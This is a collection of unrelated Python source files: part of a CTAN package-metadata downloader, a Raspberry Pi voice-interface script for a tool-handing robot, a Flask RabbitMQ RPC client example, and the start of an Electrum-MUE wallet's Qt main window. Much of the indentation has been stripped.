if (template != template_default): print(" {0:5} {2:55} {1}".format("-t", fold(template), "(" + template_text + ")"))
if (key_template != key_template_default): print(" {0:5} {2:55} {1}".format("-k", fold(key_template), "(" + key_template_text + ")"))
if (author_template != author_template_default): print(" {0:5} {2:55} {1}".format("-A", fold(author_template), "(" + author_template_text + ")"))
print("\n")
if plain: # Process all steps for a plain call.
call_plain()
    elif load:                                                # Process all steps for a complete ctanout call (without integrity check).
        call_load()
    elif check:                                               # Process all necessary steps for an integrity check.
call_check()
elif newpickle: # Regenerate the two pickle files.
regenerate_pickle_files()
check_integrity(always=True)
else:
pass
if verbose:
print("- Info: program successfully completed")
if statistics: # if statistics are to be output
make_statistics()
endtotal = time.time() # end of time measure
endprocess = time.process_time()
print("--")
print("total time: ".ljust(left + 1), round(endtotal-starttotal, rndg))
print("process time: ".ljust(left + 1), round(endprocess-startprocess, rndg))
# ------------------------------------------------------------------
def make_statistics(): # Function make_statistics(): Print statistics on terminal.
"""Print statistics on terminal."""
global counter, pdfcounter
l = left
r = 5
load = (template != "")
nrXMLfile = 0
XMLdir = os.listdir(direc)
for f in XMLdir:
if p4.match(f):
nrXMLfile += 1
print("\nStatistics\n")
print("total number of authors on CTAN:".ljust(l), str(len(authors)).rjust(r))
print("total number of topics on CTAN:".ljust(l), str(len(topics)).rjust(r))
print("total number of packages on CTAN:".ljust(l), str(len(packages)).rjust(r))
if download:
print("number of downloaded XML files:".ljust(l), str(counter).rjust(r), "(in the actual session)")
print("number of downloaded PDF files:".ljust(l), str(pdfcounter).rjust(r), "(in the actual session)")
print("number of not downloaded PDF files:".ljust(l), str(pdfctrerr).rjust(r), "(in the actual session)")
print("total number of local PDF files:".ljust(l), str(len(PDF_toc)).rjust(r))
print("total number of local XML files:".ljust(l), str(nrXMLfile).rjust(r))
if integrity:
print("number of corrected entries:".ljust(l), str(corrected).rjust(r), "(in the actual session)")
# ------------------------------------------------------------------
def regenerate_pickle_files():
"""Regenerate corrupted pickle files."""
global XML_toc, PDF_toc
global authors, packages, topics, licenses, topicspackage, packagetopics, authorpackages
# generate_pickle_files --> get_PDF_files
# generate_pickle_files --> dload_authors
# generate_pickle_files --> dload_packages
# generate_pickle_files --> dload_topics
# generate_pickle_files --> dload_licenses
# generate_pickle_files --> generate_topicspackage
# generate_pickle_files --> analyze_XML_file
# generate_pickle_files --> generate_pickle2
# generate_pickle_files --> generate_pickle1
# .................................................................
# Regeneration of CTAN2.pkl
# CTAN2.pkl needs XML_toc
if verbose:
print("--- Info: Regeneration of '{0}'".format(direc + pkl_file2))
get_PDF_files(direc)
dload_authors() # load authors
dload_packages() # load packages
dload_topics() # load topics
dload_licenses() # load licenses
generate_topicspackage() # generate topicspackage, packagetopics, authorpackages
for f in get_XML_files(direc):
if verbose:
print("----- Info: local XML file '{0}'".format(direc + f))
analyze_XML_file(f)
thr1 = Thread(target=generate_pickle2) # dump XML_toc info CTAN2.pkl
thr1.start()
thr1.join()
# .................................................................
# Regeneration of CTAN1.pkl
    # CTAN1.pkl needs authors, packages, topics, licenses, topicspackage, packagetopics, authorpackages
if verbose:
print("--- Info: Regeneration of '{0}'".format(direc + pkl_file))
thr2 = Thread(target=generate_pickle1) # dump authors, packages, topics, licenses, topicspackage, packagetopics, authorpackages into CTAN1.pkl
thr2.start()
thr2.join()
# ------------------------------------------------------------------
def set_PDF_toc():                                            # set_PDF_toc: Fill PDF_toc on the basis of XML_toc.
"""Fill PDF_toc on the basis of XML_toc."""
global PDF_toc
global XML_toc
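    # Each XML_toc entry is a (XML file name, package key, PDF file name)
    # tuple; the matching local PDF file is stored as '<key>-<PDF file name>'.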
for f in XML_toc:
(xlfn, fkey, plfn) = XML_toc[f]
if os.path.exists(direc + xlfn) and os.path.exists(direc + fkey + "-" + plfn):
PDF_toc[fkey + "-" + plfn] = xlfn
else:
pass
# ------------------------------------------------------------------
def verify_PDF_files():                                       # Function verify_PDF_files: check the updated PDF_toc; delete a PDF file if necessary
    """Check the updated PDF_toc; delete a PDF file if necessary."""
global ok
global PDF_toc
global corrected
ok = True
for g in PDF_toc: # loop: move through PDF files
if PDF_toc[g] == "": # no entry: no ass. XML file
ok = False
if verbose:
print("----- Warning: PDF file '{0}' without associated XML file".format(g))
if os.path.isfile(g): # g is file
os.remove(g) # delete the PDF file (if it exists)
corrected += 1 # number of corrections increased
if verbose:
print("----- Warning: PDF file '{0}' in OS deleted".format(g))
else:
pass
# ==================================================================
# Main part
# script --> main
if __name__ == "__main__":
main()
else:
if verbose:
print("- Error: tried to use the program indirectly")
|
yeet_speech.py
|
#!/usr/bin/env python
import sys
sys.path.append("./snowboy/examples/Python/")
import snowboydecoder_arecord as snowboydecoder
import subprocess
import signal
import io
#import sys
import os
import serial
import multiprocessing
import time
import math
import json
import numpy as np
from ctypes import c_bool
from decimal import Decimal as D
from google.cloud import speech
from google.cloud import texttospeech
from google.cloud.speech import enums
from google.cloud.speech import types
ANGLE_ELEMENT_NUM = 10
IDLE = 0
RECEIVING_REQUEST = 1
RECEIVING_TOOL_EARLY = 2
RECEIVING_TOOL_ON_TIME = 3
RECEIVING_TOOL_LATE = 4
GIVING_TOOL = 5
TRAVELLING = 6
snowboy = None
def init():
global computer
global buffer_lock
global read_buffer
global port
global doa_matrix
global doa_odas
global snowboy_lock
global request_needed
global manager
global state
global inventory
global ros_buffer
global request_text
global wakeword_process
subprocess.call(["killall", "odaslive"])
#subprocess.call(["killall", "matrix-odas"])
computer = serial.Serial(
port = '/dev/mbed',
baudrate=115200,
timeout=0.3)
#computer.write("pi speech alive")
#done = 0
#while not done:
# cmd = computer.read_until(">yeet<")
# if cmd == ">yeet<":
# done = 1
computer.write(">yeet<")
#initialise ros variables
manager = multiprocessing.Manager()
state = multiprocessing.Value('i', IDLE)
inventory = manager.list()
ros_buffer = multiprocessing.Queue()
buffer_lock = multiprocessing.Lock()
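    # state, inventory and ros_buffer are shared with the child processes via
    # multiprocessing primitives; buffer_lock guards access to the queue.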
#start doa
doa_process = multiprocessing.Process(target=listen_matrix)
doa_process.start()
#initialise thread for listening to computer and reading buffer and wakeword
port = multiprocessing.Process(target=listen_serial, args=(ros_buffer,))
port.start()
read_buffer = multiprocessing.Process(target=read_ros_buffer, args=(ros_buffer,))
read_buffer.start()
#start wake word detection
request_needed = multiprocessing.Value(c_bool, False)
snowboy_lock = multiprocessing.Lock()
wakeword_process = multiprocessing.Process(target=listen_wake_word)
wakeword_process.start()
#start_wake_word()
tts("yeetbot 3000, online")
def listen_serial(queue):
while True:
cmd = ''
time.sleep(0.1)
try:
cmd = computer.read_until("<")
if cmd:
with buffer_lock:
queue.put(cmd)
if queue.qsize() > 2:
queue.get()
except:
time.sleep(0.1)
def listen_matrix():
global computer
os.chdir("/home/pi/yeetbot/yeetbot_natural_language/pi_speech/odas/bin/")
doa_matrix = subprocess.Popen(["./matrix-odas"], stdout=subprocess.PIPE)
doa_odas = subprocess.Popen(["./odaslive", "-c", "../config/matrix-demo/matrix_voice.cfg"])
os.chdir("/home/pi/yeetbot/yeetbot_natural_language/pi_speech/")
offset=4
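    # Only roughly every 9th line of matrix-odas output is parsed; the offset
    # counter assumes one usable JSON record per block of 9 lines (an
    # assumption read off this code, not the odas documentation).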
while True:
output = doa_matrix.stdout.readline()
offset += 1
if offset == 9:
output = json.loads(output[:-2])
angle = np.arctan2(output.get('x'), output.get('y'))
serial_angle = ">a/" + str(angle) + "<"
computer.write(serial_angle)
offset -= 9
def wakeword_detected():
global request_needed
global snowboy
global computer
print("wakeword detected")
request_needed.value = True
serial_detect = ">d/<"
computer.write(serial_detect)
snowboy.terminate()
def listen_wake_word():
global snowboy
snowboy = snowboydecoder.HotwordDetector("snowboy/examples/Python/resources/models/snowboy.umdl", sensitivity=0.5)
print("starting thread snowboy")
snowboy.start(detected_callback=wakeword_detected, sleep_time=0.25)
def read_ros_buffer(queue):
global ros_buffer
global wakeword_process
while True:
with buffer_lock:
if not ros_buffer.empty():
msg = ros_buffer.get()
update_states(msg)
else:
continue
time.sleep(0.3)
def update_states(msg):
global inventory
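    # Serial messages are framed as '>X/payload<': the first three characters
    # select the topic ('>i/' inventory, '>s/' state, '>m/' speak) and the
    # trailing '<' is stripped from the payload.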
topic, msg = msg[:3], msg[3:-1]
#inventory update
if topic == ">i/":
inventory[:] = []
for tool in list(msg.split(",")):
inventory.append(tool)
#state update
elif topic == ">s/":
state.value = int(msg)
if state.value == IDLE:
try:
wakeword_process = multiprocessing.Process(target=listen_wake_word)
wakeword_process.start()
except:
pass
#make yeetbot speak
elif topic == ">m/":
tts(msg)
def record_speech():
global snowboy
global wakeword_process
global request_needed
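    # Stop the hotword detector so it releases the microphone, record a fixed
    # 4-second clip with arecord, transcribe it, then restart the detector.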
print("listening...\n")
wakeword_process.terminate()
wakeword_process.join()
subprocess.call(["killall", "arecord"])
time.sleep(0.1)
subprocess.call(["arecord", "recording.wav", "-f", "S16_LE", "-r", "44100", "-d", "4", "-D", "hw:2,0"])
transcribe_file("recording.wav")
request_needed.value = False
wakeword_process = multiprocessing.Process(target=listen_wake_word)
wakeword_process.start()
def tts(text):
    print(text)
client = texttospeech.TextToSpeechClient()
synthesis_input = texttospeech.types.SynthesisInput(text=text)
voice = texttospeech.types.VoiceSelectionParams(
language_code="en-AU",
name="en-AU-Wavenet-B",
ssml_gender=texttospeech.enums.SsmlVoiceGender.MALE)
audio_config = texttospeech.types.AudioConfig(
audio_encoding=texttospeech.enums.AudioEncoding.LINEAR16)
response = client.synthesize_speech(synthesis_input, voice, audio_config)
with open('yeetbot_talks.wav', 'wb') as out:
out.write(response.audio_content)
subprocess.call(["aplay", "yeetbot_talks.wav"])
def transcribe_file(speech_file):
client = speech.SpeechClient()
with io.open(speech_file, 'rb') as audio_file:
content = audio_file.read()
audio = types.RecognitionAudio(content=content)
config = types.RecognitionConfig(
encoding=enums.RecognitionConfig.AudioEncoding.LINEAR16,
sample_rate_hertz=44100,
language_code='en-GB')
response = client.recognize(config, audio)
#over serial, user response composed as ">u/[choice],[invalid_choice]"
serial_user_response = ""
for result in response.results:
sentence = result.alternatives[0].transcript.split()
serial_user_response = ">u/"
if "return" in sentence:
serial_user_response += "-1,f"
else:
invalid_choice = True
for word in sentence:
for tool in inventory:
if word == tool:
serial_user_response += str(inventory.index(tool)) + ","
invalid_choice = False
                        print(tool)
serial_user_response += "t" if invalid_choice else "f"
serial_user_response += "<"
computer.write(serial_user_response)
def main():
global request_needed
init()
while True:
if state.value == IDLE:
time.sleep(0.05)
elif state.value == RECEIVING_REQUEST:
if request_needed.value:
record_speech()
else:
time.sleep(0.05)
elif state.value == RECEIVING_TOOL_EARLY:
time.sleep(0.05)
elif state.value == RECEIVING_TOOL_LATE:
time.sleep(0.05)
elif state.value == RECEIVING_TOOL_ON_TIME:
time.sleep(0.05)
elif state.value == GIVING_TOOL:
time.sleep(0.05)
elif state.value == TRAVELLING:
time.sleep(0.05)
else:
time.sleep(0.05)
if __name__ == '__main__':
main()
|
flask_threaded_rpc_client.py
|
"""
Example of a Flask web application using RabbitMQ for RPC calls.
"""
import threading
from time import sleep
import amqpstorm
from amqpstorm import Message
from flask import Flask
APP = Flask(__name__)
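# Note: this example assumes a RabbitMQ broker on 'localhost' with the default
# 'guest'/'guest' credentials (see RPC_CLIENT below) and a separate RPC server
# consuming from 'rpc_queue'; neither is started by this script.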
class RpcClient(object):
"""Asynchronous Rpc client."""
def __init__(self, host, username, password, rpc_queue):
self.queue = {}
self.host = host
self.username = username
self.password = password
self.channel = None
self.connection = None
self.callback_queue = None
self.rpc_queue = rpc_queue
self.open()
def open(self):
"""Open Connection."""
self.connection = amqpstorm.Connection(self.host, self.username,
self.password)
self.channel = self.connection.channel()
self.channel.queue.declare(self.rpc_queue)
result = self.channel.queue.declare(exclusive=True)
self.callback_queue = result['queue']
self.channel.basic.consume(self._on_response, no_ack=True,
queue=self.callback_queue)
self._create_process_thread()
def _create_process_thread(self):
"""Create a thread responsible for consuming messages in response
RPC requests.
"""
thread = threading.Thread(target=self._process_data_events)
        thread.daemon = True
thread.start()
def _process_data_events(self):
"""Process Data Events using the Process Thread."""
self.channel.start_consuming()
def _on_response(self, message):
"""On Response store the message with the correlation id in a local
dictionary.
"""
self.queue[message.correlation_id] = message.body
def send_request(self, payload):
# Create the Message object.
message = Message.create(self.channel, payload)
message.reply_to = self.callback_queue
# Create an entry in our local dictionary, using the automatically
# generated correlation_id as our key.
self.queue[message.correlation_id] = None
# Publish the RPC request.
message.publish(routing_key=self.rpc_queue)
# Return the Unique ID used to identify the request.
return message.correlation_id
@APP.route('/rpc_call/<payload>')
def rpc_call(payload):
"""Simple Flask implementation for making asynchronous Rpc calls. """
    # Send the request and store the request's Unique ID.
corr_id = RPC_CLIENT.send_request(payload)
# Wait until we have received a response.
# TODO: Add a timeout here and clean up if it fails!
while RPC_CLIENT.queue[corr_id] is None:
sleep(0.1)
# Return the response to the user.
return RPC_CLIENT.queue.pop(corr_id)
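# Hypothetical usage once the app and an RPC server are running (Flask's
# default bind is 127.0.0.1:5000):
#     curl http://127.0.0.1:5000/rpc_call/hello
# The route blocks until the matching reply shows up on the callback queue.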
if __name__ == '__main__':
RPC_CLIENT = RpcClient('localhost', 'guest', 'guest', 'rpc_queue')
APP.run()
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import webbrowser
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QSpinBox, QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit, QTreeWidgetItem,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QMenu, QSizePolicy, QStatusBar)
import electrum_mue as electrum
from electrum_mue import (keystore, simple_config, ecc, constants, util, bitcoin, commands,
coinchooser, paymentrequest)
from electrum_mue.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum_mue.plugin import run_hook
from electrum_mue.i18n import _
from electrum_mue.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain, NotEnoughFunds,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword,
base_units, base_units_list, base_unit_name_to_decimal_point,
decimal_point_to_base_unit_name, quantize_feerate,
UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter)
from electrum_mue.transaction import Transaction, TxOutput
from electrum_mue.address_synchronizer import AddTransactionException
from electrum_mue.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption)
from electrum_mue.version import ELECTRUM_VERSION
from electrum_mue.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum_mue.exchange_rate import FxThread
from electrum_mue.simple_config import SimpleConfig
from electrum_mue.logging import Logger
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, FromList, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton, expiration_values,
ButtonsLineEdit, CopyCloseButton, import_meta_gui, export_meta_gui,
filename_field, address_field)
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
from electrum_mue.paymentrequest import PR_PAID
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
maternode_signal = pyqtSignal()
def __init__(self, gui_object, wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
assert wallet, "no wallet"
self.wallet = wallet
self.fx = gui_object.daemon.fx # type: FxThread
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tl_windows = []
self.tx_external_keypairs = {}
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
decimal_point_to_base_unit_name(self.decimal_point)
except UnknownBaseUnit:
self.decimal_point = DECIMAL_POINT_DEFAULT
self.num_zeros = int(config.get('num_zeros', 0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(QIcon(":icons/electrum-mue.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
def on_history(self, b):
self.wallet.clear_coin_price_cache()
self.new_fx_history_signal.emit()
def setup_exception_hook(self):
Exception_Hook(self)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(str(e))
def on_network(self, event, *args):
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event in ['status', 'banner', 'verified', 'fee', 'fee_histogram']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.logger.info(f"unexpected network message: {event} {args}")
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
elif event == 'fee_histogram':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
self.history_model.on_fee_histogram()
else:
self.logger.info(f"unexpected network_qt signal: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
self.need_update.set()
        # Once the GUI has been initialized, check whether we want to announce something, since the callback was already triggered before the GUI existed
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum-MUE Testnet" if constants.net.TESTNET else "Electrum-MUE"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend MUEs with it."),
_("Make sure you own the seed phrase or the private keys, before you request MUEs to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Bitcoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
